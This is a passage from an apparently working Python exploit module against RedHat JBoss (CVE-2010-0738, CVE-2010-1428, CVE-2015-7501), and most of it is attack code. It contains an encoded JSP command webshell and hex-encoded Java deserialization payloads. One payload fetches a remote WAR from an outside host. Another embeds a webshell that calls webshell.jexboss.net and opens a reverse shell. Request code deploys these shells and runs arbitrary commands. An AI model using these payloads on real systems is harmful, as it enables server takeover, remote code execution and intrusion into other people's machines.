"%28%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%6c%69%6e%65%2e%61%70%70%65%6e%64%28%65%2e%67%65%74%4d%65"
"%73%73%61%67%65%28%29%29%3b%7d%72%65%74%75%72%6e%20%6c%69%6e%65%2e%74%6f%53%74%72%69%6e%67%28%29%3b%7d"
"%25%3e%3c%25%69%66%28%22%70%61%73%73%77%6f%72%64%22%2e%65%71%75%61%6c%73%28%72%65%71%75%65%73%74%2e%67"
"%65%74%50%61%72%61%6d%65%74%65%72%28%22%70%77%64%22%29%29%26%26%21%22%22%2e%65%71%75%61%6c%73%28%72%65"
"%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%29%29%7b%6f%75%74%2e%70%72"
"%69%6e%74%6c%6e%28%22%3c%70%72%65%3e%22%2b%65%78%63%75%74%65%43%6d%64%28%72%65%71%75%65%73%74%2e%67%65"
"%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%29%2b%22%3c%2f%70%72%65%3e%22%29%3b%7d%65%6c%73%65"
"%7b%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%3a%2d%29%22%29%3b%7d%25%3e")
self.payload_cve_2010_1428 = (
"\xAC\xED\x00\x05\x73\x72\x00\x2E\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x63\x6F\x6E\x73\x6F"
"\x6C\x65\x2E\x72\x65\x6D\x6F\x74\x65\x2E\x52\x65\x6D\x6F\x74\x65\x4D\x42\x65\x61\x6E\x49\x6E\x76"
"\x6F\x63\x61\x74\x69\x6F\x6E\xE0\x4F\xA3\x7A\x74\xAE\x8D\xFA\x02\x00\x04\x4C\x00\x0A\x61\x63\x74"
"\x69\x6F\x6E\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72"
"\x69\x6E\x67\x3B\x5B\x00\x06\x70\x61\x72\x61\x6D\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C"
"\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x5B\x00\x09\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x74"
"\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x10"
"\x74\x61\x72\x67\x65\x74\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x74\x00\x1D\x4C\x6A\x61\x76\x61"
"\x78\x2F\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2F\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x3B"
"\x78\x70\x74\x00\x06\x64\x65\x70\x6C\x6F\x79\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61"
"\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x96\x25\x37\x36\x1A"
"\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\x49\x00\x04\x70\x6F\x72\x74"
"\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x71\x00\x7E\x00\x01\x4C\x00\x04\x66\x69\x6C\x65"
"\x71\x00\x7E\x00\x01\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x01\x4C\x00\x08\x70\x72\x6F\x74"
"\x6F\x63\x6F\x6C\x71\x00\x7E\x00\x01\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x01\x78\x70\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\x74\x00\x0E\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66\x2E\x63\x6F\x6D\x74"
"\x00\x0F\x2F\x72\x6E\x70\x2F\x6A\x65\x78\x77\x73\x34\x2E\x77\x61\x72\x71\x00\x7E\x00\x0B\x74\x00"
"\x04\x68\x74\x74\x70\x70\x78\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53"
"\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74"
"\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x73\x72\x00\x1B\x6A\x61\x76\x61\x78\x2E"
"\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x0F\x03\xA7"
"\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x21\x6A\x62\x6F\x73\x73\x2E\x73\x79\x73\x74\x65"
"\x6D\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x4D\x61\x69\x6E\x44\x65\x70\x6C\x6F\x79\x65\x72\x78")
self.payload_cve_2015_7501 = (
"\xAC\xED\x00\x05\x73\x72\x00\x29\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63"
"\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x49\x6E\x76\x6F\x63\x61\x74\x69"
"\x6F\x6E\xF6\x06\x95\x27\x41\x3E\xA4\xBE\x0C\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xC1\xD0"
"\x53\x87\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12"
"\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\x78\x72\x00\x10\x6A\x61"
"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00"
"\x00\x78\x70\xE3\x2C\x60\xE6\x73\x72\x00\x24\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76"
"\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x56\x61\x6C\x75\x65\xEA"
"\xCC\xE0\xD1\xF4\x4A\xD0\x99\x0C\x00\x00\x78\x70\x7A\x00\x00\x04\x00\x00\x00\x09\xD3\xAC\xED\x00"
"\x05\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B"
"\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1B\x6A\x61\x76"
"\x61\x78\x2E\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65"
"\x0F\x03\xA7\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x2C\x6A\x62\x6F\x73\x73\x2E\x61\x64"
"\x6D\x69\x6E\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x44\x65\x70\x6C\x6F\x79\x6D\x65\x6E\x74\x46\x69"
"\x6C\x65\x52\x65\x70\x6F\x73\x69\x74\x6F\x72\x79\x78\x74\x00\x05\x73\x74\x6F\x72\x65\x75\x71\x00"
"\x7E\x00\x00\x00\x00\x00\x05\x74\x00\x0B\x6A\x65\x78\x69\x6E\x76\x34\x2E\x77\x61\x72\x74\x00\x07"
"\x6A\x65\x78\x69\x6E\x76\x34\x74\x00\x04\x2E\x6A\x73\x70\x74\x08\x98\x3C\x25\x40\x20\x70\x61\x67"
"\x65\x20\x69\x6D\x70\x6F\x72\x74\x3D\x22\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x2A\x2C\x6A\x61"
"\x76\x61\x2E\x75\x74\x69\x6C\x2E\x2A\x2C\x6A\x61\x76\x61\x2E\x69\x6F\x2E\x2A\x2C\x6A\x61\x76\x61"
"\x2E\x6E\x65\x74\x2E\x2A\x22\x20\x70\x61\x67\x65\x45\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54"
"\x46\x2D\x38\x22\x25\x3E\x20\x3C\x70\x72\x65\x3E\x20\x3C\x25\x20\x63\x6C\x61\x73\x73\x20\x72\x76"
"\x20\x65\x78\x74\x65\x6E\x64\x73\x20\x54\x68\x72\x65\x61\x64\x7B\x49\x6E\x70\x75\x74\x53\x74\x72"
"\x65\x61\x6D\x20\x69\x73\x3B\x4F\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x6F\x73\x3B\x72"
"\x76\x28\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x69\x73\x2C\x4F\x75\x74\x70\x75\x74\x53"
"\x74\x72\x65\x61\x6D\x20\x6F\x73\x29\x7B\x74\x68\x69\x73\x2E\x69\x73\x3D\x69\x73\x3B\x74\x68\x69"
"\x73\x2E\x6F\x73\x3D\x6F\x73\x3B\x7D\x70\x75\x62\x6C\x69\x63\x20\x76\x6F\x69\x64\x20\x72\x75\x6E"
"\x28\x29\x7B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x69\x6E\x3D\x6E\x75\x6C"
"\x6C\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x20\x6F\x75\x74\x3D\x6E\x75\x6C"
"\x6C\x3B\x74\x72\x79\x7B\x69\x6E\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61"
"\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65"
"\x72\x28\x74\x68\x69\x73\x2E\x69\x73\x29\x29\x3B\x6F\x75\x74\x3D\x6E\x65\x77\x20\x42\x75\x66\x66"
"\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x28\x6E\x65\x77\x20\x4F\x75\x74\x70\x75\x74\x53\x74\x72"
"\x65\x61\x6D\x57\x72\x69\x74\x65\x72\x28\x74\x68\x69\x73\x2E\x6F\x73\x29\x29\x3B\x63\x68\x61\x72"
"\x20\x62\x5B\x5D\x3D\x6E\x65\x77\x20\x63\x68\x61\x72\x5B\x38\x31\x39\x32\x5D\x3B\x69\x6E\x74\x20"
"\x6C\x3B\x77\x68\x69\x6C\x65\x28\x28\x6C\x3D\x69\x6E\x2E\x72\x65\x61\x64\x28\x62\x2C\x30\x2C\x62"
"\x2E\x6C\x65\x6E\x67\x74\x68\x29\x29\x3E\x30\x29\x7B\x6F\x75\x74\x2E\x77\x72\x69\x74\x65\x28\x62"
"\x2C\x30\x2C\x6C\x29\x3B\x6F\x75\x74\x2E\x66\x6C\x75\x73\x68\x28\x29\x3B\x7D\x7D\x63\x61\x74\x63"
"\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x20\x65\x29\x7B\x7D\x7D\x7D\x53\x74\x72\x69\x6E\x67"
"\x20\x73\x68\x3D\x6E\x75\x6C\x6C\x3B\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50"
"\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x21\x3D\x6E\x75\x6C\x6C\x29\x7B\x73"
"\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22"
"\x70\x70\x70\x22\x29\x3B\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67"
"\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x58\x2D\x4A\x45\x58\x22\x29\x21\x3D\x20\x6E\x75\x6C\x6C"
"\x29\x7B\x73\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22"
"\x58\x2D\x4A\x45\x58\x22\x29\x3B\x7D\x69\x66\x28\x73\x68\x20\x21\x3D\x20\x6E\x75\x6C\x6C\x29\x7B"
"\x72\x65\x73\x70\x6F\x6E\x73\x65\x2E\x73\x65\x74\x43\x6F\x6E\x74\x65\x6E\x74\x54\x79\x70\x65\x28"
"\x22\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C\x22\x29\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61"
"\x64\x65\x72\x20\x62\x72\x3D\x6E\x75\x6C\x6C\x3B\x53\x74\x72\x69\x6E\x67\x20\x6C\x68\x63\x3D\x28"
"\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2E\x74\x6F\x53\x74\x72\x69\x6E\x67\x28\x29\x2E\x73\x70"
"\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2B\x22\x68\x2E\x6C\x6F\x67\x22\x29\x2E\x72\x65\x70"
"\x6C\x61\x63\x65\x41\x6C\x6C\x28\x22\x20\x22\x2C\x22\x2D\x22\x29\x3B\x74\x72\x79\x7B\x69\x66\x28"
"\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x7A\x00\x00\x04\x00\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22"
"\x6E\x6F\x2D\x63\x68\x65\x63\x6B\x2D\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3D\x3D\x6E\x75\x6C\x6C"
"\x29\x7B\x48\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x20\x63\x3D\x28\x48"
"\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x29\x6E\x65\x77\x20\x55\x52\x4C"
"\x28\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x65\x62\x73\x68\x65\x6C\x6C\x2E\x6A\x65\x78\x62\x6F\x73"
"\x73\x2E\x6E\x65\x74\x2F\x6A\x73\x70\x5F\x76\x65\x72\x73\x69\x6F\x6E\x2E\x74\x78\x74\x22\x29\x2E"
"\x6F\x70\x65\x6E\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x28\x29\x3B\x63\x2E\x73\x65\x74\x52\x65"
"\x71\x75\x65\x73\x74\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x55\x73\x65\x72\x2D\x41\x67\x65\x6E"
"\x74\x22\x2C\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6F"
"\x73\x74\x22\x29\x2B\x22\x3C\x2D\x22\x2B\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x52\x65\x6D"
"\x6F\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3B\x69\x66\x28\x21\x6E\x65\x77\x20\x46\x69\x6C\x65\x28"
"\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x2E\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7B"
"\x50\x72\x69\x6E\x74\x57\x72\x69\x74\x65\x72\x20\x77\x3D\x6E\x65\x77\x20\x50\x72\x69\x6E\x74\x57"
"\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x3B\x77\x2E\x63\x6C"
"\x6F\x73\x65\x28\x29\x3B\x62\x72\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61"
"\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65"
"\x72\x28\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53"
"\x74\x72\x69\x6E\x67\x20\x6C\x76\x3D\x62\x72\x2E\x72\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x2E\x73"
"\x70\x6C\x69\x74\x28\x22\x20\x22\x29\x5B\x31\x5D\x3B\x69\x66\x28\x21\x6C\x76\x2E\x65\x71\x75\x61"
"\x6C\x73\x28\x22\x34\x22\x29\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x28\x22\x4E\x65\x77\x20"
"\x76\x65\x72\x73\x69\x6F\x6E\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x75\x70\x64\x61\x74\x65\x21\x22"
"\x29\x3B\x7D\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22"
"\x69\x64\x22\x29\x21\x3D\x2D\x31\x7C\x7C\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x69\x70"
"\x63\x6F\x6E\x66\x69\x67\x22\x29\x21\x3D\x2D\x31\x29\x7B\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74"
"\x53\x74\x72\x65\x61\x6D\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70\x74"
"\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x46\x61\x69\x6C"
"\x65\x64\x20\x74\x6F\x20\x63\x68\x65\x63\x6B\x20\x66\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22"
"\x29\x3B\x7D\x74\x72\x79\x7B\x50\x72\x6F\x63\x65\x73\x73\x20\x70\x3B\x62\x6F\x6F\x6C\x65\x61\x6E"
"\x20\x6E\x69\x78\x3D\x74\x72\x75\x65\x3B\x69\x66\x28\x21\x53\x79\x73\x74\x65\x6D\x2E\x67\x65\x74"
"\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6C\x65\x2E\x73\x65\x70\x61\x72\x61\x74\x6F\x72"
"\x22\x29\x2E\x65\x71\x75\x61\x6C\x73\x28\x22\x2F\x22\x29\x29\x7B\x6E\x69\x78\x3D\x66\x61\x6C\x73"
"\x65\x3B\x7D\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x6A\x65\x78\x72\x65\x6D"
"\x6F\x74\x65\x3D\x22\x29\x21\x3D\x2D\x31\x29\x7B\x53\x6F\x63\x6B\x65\x74\x20\x73\x63\x3D\x6E\x65"
"\x77\x20\x53\x6F\x63\x6B\x65\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3D\x22\x29\x5B\x31"
"\x5D\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2C\x49\x6E\x74\x65\x67\x65\x72\x2E"
"\x70\x61\x72\x73\x65\x49\x6E\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x31"
"\x5D\x29\x29\x3B\x69\x66\x28\x6E\x69\x78\x29\x7B\x73\x68\x3D\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73"
"\x68\x22\x3B\x7D\x65\x6C\x73\x65\x7B\x73\x68\x3D\x22\x63\x6D\x64\x2E\x65\x78\x65\x22\x3B\x7D\x70"
"\x3D\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78"
"\x65\x63\x28\x73\x68\x29\x3B\x28\x6E\x65\x77\x20\x72\x76\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x73\x63\x2E\x67\x65\x74\x4F\x75\x74\x70\x75\x74\x53\x74"
"\x72\x65\x61\x6D\x28\x29\x29\x29\x2E\x73\x74\x61\x72\x74\x28\x29\x3B\x28\x6E\x65\x77\x20\x72\x76"
"\x28\x73\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x70\x2E\x67"
"\x65\x74\x4F\x75\x74\x70\x7A\x00\x00\x01\xDB\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x2E"
"\x73\x74\x61\x72\x74\x28\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x69\x66\x28\x6E\x69\x78\x29\x7B\x70\x3D"
"\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65"
"\x63\x28\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x5B\x5D\x7B\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73"
"\x68\x22\x2C\x22\x2D\x63\x22\x2C\x73\x68\x7D\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x70\x3D\x52\x75\x6E"
"\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65\x63\x28\x22"
"\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x43\x20\x22\x2B\x73\x68\x29\x3B\x7D\x62\x72\x3D\x6E\x65\x77"
"\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65\x72\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75\x74"
"\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53\x74\x72\x69\x6E\x67\x20\x64\x3D\x62\x72\x2E\x72"
"\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x77\x68\x69\x6C\x65\x28\x64\x20\x21\x3D\x20\x6E\x75\x6C"
"\x6C\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x64\x29\x3B\x64\x3D\x62\x72\x2E\x72"
"\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70"
"\x74\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x55\x6E\x6B"
"\x6E\x6F\x77\x6E\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x22\x29\x3B\x7D\x7D\x25\x3E\x73\x72\x00\x11\x6A"
"\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x42\x6F\x6F\x6C\x65\x61\x6E\xCD\x20\x72\x80\xD5\x9C\xFA\xEE"
"\x02\x00\x01\x5A\x00\x05\x76\x61\x6C\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61"
"\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00"
"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E"
"\x67\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x74\x00\x07\x62\x6F\x6F\x6C\x65"
"\x61\x6E\xF9\x12\x63\x17\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6F\x72\x67"
"\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x49\x6E\x76\x6F\x63\x61"
"\x74\x69\x6F\x6E\x4B\x65\x79\xB8\xFB\x72\x84\xD7\x93\x85\xF9\x02\x00\x01\x49\x00\x07\x6F\x72\x64"
"\x69\x6E\x61\x6C\x78\x70\x00\x00\x00\x04\x70\x78")
# 2020-09-23
def cve_2010_0738(self):
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1'
self.pocname = "RedHat JBoss: CVE-2010-0738"
self.info = CodeTest.Colored_.de() + " [jmx-console]"
self.path = "/jmx-console/HtmlAdaptor"
self.rawdata = "null"
self.r = "PoCWating"
self.method = "head"
self.data = ":-)"
self.poc = ("?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
"store&argType=java.lang.String&arg0=shells.war&argType=java.lang.String&arg1=shells&argType=java"
".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + self.data + "&argType=boolean&arg4=True")
self.exp = ("?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
"store&argType=java.lang.String&arg0=" + self.name + ".war&argType=java.lang.String&arg1="+self.name+"&argType=java"
".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + self.jsp_webshell + "&argType=boolean&arg4=True")
self.headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive"}
try:
if CodeTest.VULN is None:
self.request = requests.head(self.url + self.path + self.poc , headers=self.headers, timeout=TIMEOUT, verify=False)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
self.request = requests.get(self.url + "/shells/shells.jsp", headers=self.headers, timeout=TIMEOUT, verify=False)
CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info)
else:
self.request = requests.head(self.url + self.path + self.exp , headers=self.headers, timeout=TIMEOUT, verify=False)
self.jsp = ">>> " + self.url + "/" + self.name + "/" + self.name + ".jsp" + "?pwd=password&cmd=" + CMD
CodeTest.verify.generic_output(self.jsp, self.pocname, self.method, self.rawdata, self.info)
except requests.exceptions.Timeout as error:
CodeTest.verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
CodeTest.verify.connection_output(self.pocname)
except Exception as error:
CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
# 2020-09-24
def cve_2010_1428(self):
self.pocname = "RedHat JBoss: CVE-2010-1428"
self.info = CodeTest.Colored_.de() + " [web-console]"
self.path = "/web-console/Invoker"
self.rawdata = "null"
self.r = "PoCWating"
self.method = "head"
self.data = ":-)"
try:
if CodeTest.VULN is None:
self.request = requests.post(self.url + self.path, data=self.data, headers=self.headers)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
if r"WWW-Authenticate" in self.request.headers:
self.r = "PoCSuCCeSS"
CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info)
else:
self.request = requests.head(self.url + self.path, data=self.payload_cve_2010_1428, headers=self.headers, timeout=TIMEOUT, verify=False)
self.cmd = urlencode({"ppp": CMD})
self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" + self.cmd, headers=self.headers, timeout=TIMEOUT, verify=False)
time.sleep(2)
CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info)
except requests.exceptions.Timeout as error:
CodeTest.verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
CodeTest.verify.connection_output(self.pocname)
except Exception as error:
CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
# 2020-09-23 RedHat JBoss: CVE-2015-7501, JMXInvokerServlet
def cve_2015_7501(self):
self.pocname = "RedHat JBoss: CVE-2015-7501"
self.info = CodeTest.Colored_.de() + " [JMXInvokerServlet]"
self.path = "/invoker/JMXInvokerServlet"
self.rawdata = ">_< There are no requests and responses for special reasons"
self.r = "PoCWating"
self.method = "head"
self.data = ":-)"
try:
if CodeTest.VULN is None:
self.request = requests.head(self.url + self.path, data=self.data, headers=self.headers)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
if r"jboss" in self.request.headers["Content-Type"]:
self.r = "PoCSuCCeSS"
CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info)
else:
self.request = requests.post(self.url + self.path, data=self.payload_cve_2015_7501, headers=self.headers, timeout=TIMEOUT, verify=False)
self.cmd = urlencode({"ppp": CMD})
self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" + self.cmd, headers=self.headers, timeout=TIMEOUT, verify=False)
time.sleep(2)
CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info)
except requests.exceptions.Timeout as error:
CodeTest.verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
CodeTest.verify.connection_output(self.pocname)
except Exception as error:
CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
print("""eg: http://119.3.36.68:9001/
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
| Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
| RedHat JBoss | cve_2010_0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |
| RedHat JBoss | cve_2010_1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |
| RedHat JBoss | cve_2015_7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+""")
def check(**kwargs):
if CodeTest.VULN == None:
ExpRedHatJBoss = RedHatJBoss(_urlparse(kwargs['url']),"echo VuLnEcHoPoCSuCCeSS")
else:
ExpRedHatJBoss = RedHatJBoss(_urlparse(kwargs['url']),kwargs['cmd'])
if kwargs['pocname'] == "cve_2010_0738":
